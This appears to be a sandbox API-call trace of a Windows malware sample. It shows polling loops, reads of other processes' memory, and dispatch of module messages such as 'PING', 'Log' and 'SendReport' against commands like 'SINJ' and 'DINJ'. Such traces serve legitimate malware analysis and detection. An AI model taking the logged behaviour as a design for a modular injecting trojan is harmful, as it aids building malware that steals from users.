	[0248.259] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.259] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.259] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.259] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.259] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.259] Sleep (dwMilliseconds=0xbb8) 
	[0248.277] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.277] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.277] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.278] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.278] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.278] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.278] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.278] Sleep (dwMilliseconds=0xbb8) 
	[0248.291] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.291] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.291] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.291] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.291] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.291] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.291] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.291] Sleep (dwMilliseconds=0xbb8) 
	[0248.306] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.307] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.307] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.307] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.307] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.307] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.307] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.307] Sleep (dwMilliseconds=0xbb8) 
	[0248.323] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.324] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.324] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.324] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.324] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.324] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.324] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.324] Sleep (dwMilliseconds=0xbb8) 
	[0248.339] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.339] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.339] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.339] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.339] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.339] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.339] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.339] Sleep (dwMilliseconds=0xbb8) 
	[0248.353] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.354] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.354] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.354] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.354] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.354] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.354] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.354] Sleep (dwMilliseconds=0xbb8) 
	[0248.368] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.368] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.368] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.368] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.369] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.369] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.369] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.369] Sleep (dwMilliseconds=0xbb8) 
	[0248.384] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.384] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.384] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.384] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.384] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.384] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.384] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.384] Sleep (dwMilliseconds=0xbb8) 
	[0248.400] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.400] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.400] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.400] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.400] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.400] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.400] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0248.400] Sleep (dwMilliseconds=0xbb8) 
	[0248.415] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.415] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.415] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.415] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.415] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.415] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.415] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778410) returned 1
	[0248.415] Sleep (dwMilliseconds=0xbb8) 
	[0248.431] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.431] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.431] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.431] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.431] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.431] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.431] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778410) returned 1
	[0248.431] Sleep (dwMilliseconds=0xbb8) 
	[0248.446] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0248.447] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0248.447] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0248.447] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0248.447] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0248.447] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0248.447] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778410) returned 1
	[0248.447] Sleep (dwMilliseconds=0xbb8) 
	[0250.584] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0250.584] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225d20, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225d20*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0250.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0250.584] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff8e8
	[0250.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x22ff8e8, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0250.584] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0250.584] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225eb8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225eb8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0250.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0250.584] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2f10
	[0250.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x27c2f10, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0250.584] SetEvent (hEvent=0x474) returned 1
	[0250.584] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0250.584] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0250.584] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0250.584] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c40b8
	[0250.584] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0250.584] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0250.584] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0250.584] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0250.584] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0250.584] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffd80
	[0250.584] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27c4090, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xf50) returned 0x618
	[0250.585] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c40e0
	[0250.585] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0250.585] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0250.585] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0250.585] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0250.585] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0250.585] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c40e0) returned 1
	[0253.594] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0253.595] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0253.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0253.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0253.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x22ffa08, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0253.595] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0253.595] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x226160, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x226160*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0253.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0253.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778d48
	[0253.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226160, cbMultiByte=-1, lpWideCharStr=0x2778d48, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0253.595] SetEvent (hEvent=0x474) returned 1
	[0253.595] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0253.595] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0253.595] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x226160) returned 1
	[0253.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27789b0
	[0253.595] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0253.595] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0253.595] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0253.595] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0253.596] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0253.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffeb8
	[0253.596] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2778d20, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xf60) returned 0x690
	[0253.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778438
	[0253.596] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0253.596] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x102
	[0253.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x226160
	[0253.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0253.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0253.596] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0253.596] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x1000438c, lpBuffer=0x226160, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x226160*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0253.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4
	[0253.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff510
	[0253.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226160, cbMultiByte=-1, lpWideCharStr=0x22ff510, cchWideChar=4 | out: lpWideCharStr="Log") returned 4
	[0253.596] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x170f6fc, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0253.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26b8780, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4
	[0253.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0253.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26b8780, cbMultiByte=-1, lpWideCharStr=0x22ffe70, cchWideChar=4 | out: lpWideCharStr="/1/") returned 4
	[0253.596] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10005260, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0253.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0253.597] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27782d0
	[0253.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x27782d0, cchWideChar=11 | out: lpWideCharStr="SendReport") returned 11
	[0253.597] SetEvent (hEvent=0x4b0) returned 1
	[0253.599] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x226160) returned 1
	[0253.599] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0253.599] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0253.599] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e98
	[0253.599] lstrcmpiW (lpString1="Log", lpString2="ModuleQuery") returned -1
	[0253.599] lstrcmpiW (lpString1="Log", lpString2="WantRelease") returned -1
	[0253.599] lstrcmpiW (lpString1="Log", lpString2="VERS") returned -1
	[0253.599] lstrcmpiW (lpString1="Log", lpString2="SINJ") returned -1
	[0253.599] lstrcmpiW (lpString1="Log", lpString2="DINJ") returned 1
	[0253.599] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff48
	[0253.599] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2778438, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xf44) returned 0x660
	[0253.599] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c07b0
	[0253.599] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0253.600] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0253.600] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0253.600] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c07b0) returned 1
	[0256.605] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0256.605] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225eb8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225eb8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0256.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0256.605] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa50
	[0256.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x22ffa50, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0256.606] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0256.606] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x226160, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x226160*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0256.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0256.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0468
	[0256.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226160, cbMultiByte=-1, lpWideCharStr=0x27c0468, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0256.606] SetEvent (hEvent=0x474) returned 1
	[0256.606] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0256.606] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0256.606] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x226160) returned 1
	[0256.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4130
	[0256.606] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0256.606] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0256.606] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0256.606] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0256.606] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0256.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa20
	[0256.606] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27c2600, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xf54) returned 0x700
	[0256.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bff68
	[0256.607] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0256.607] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x102
	[0256.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x226160
	[0256.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0256.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225eb8
	[0256.607] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0256.607] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x1000438c, lpBuffer=0x226160, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x226160*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0256.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4
	[0256.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fffa8
	[0256.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226160, cbMultiByte=-1, lpWideCharStr=0x22fffa8, cchWideChar=4 | out: lpWideCharStr="Log") returned 4
	[0256.607] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x1000526c, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0256.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26b8780, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25
	[0256.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7668
	[0256.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26b8780, cbMultiByte=-1, lpWideCharStr=0x22c7668, cchWideChar=25 | out: lpWideCharStr="Report successfully sent") returned 25
	[0256.607] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10005260, lpBuffer=0x225eb8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225eb8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0256.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0256.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c40e0
	[0256.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x27c40e0, cchWideChar=11 | out: lpWideCharStr="SendReport") returned 11
	[0256.607] SetEvent (hEvent=0x4b0) returned 1
	[0256.609] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x226160) returned 1
	[0256.609] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0256.609] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0256.609] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c40b8
	[0256.609] lstrcmpiW (lpString1="Log", lpString2="ModuleQuery") returned -1
	[0256.609] lstrcmpiW (lpString1="Log", lpString2="WantRelease") returned -1
	[0256.609] lstrcmpiW (lpString1="Log", lpString2="VERS") returned -1
	[0256.610] lstrcmpiW (lpString1="Log", lpString2="SINJ") returned -1
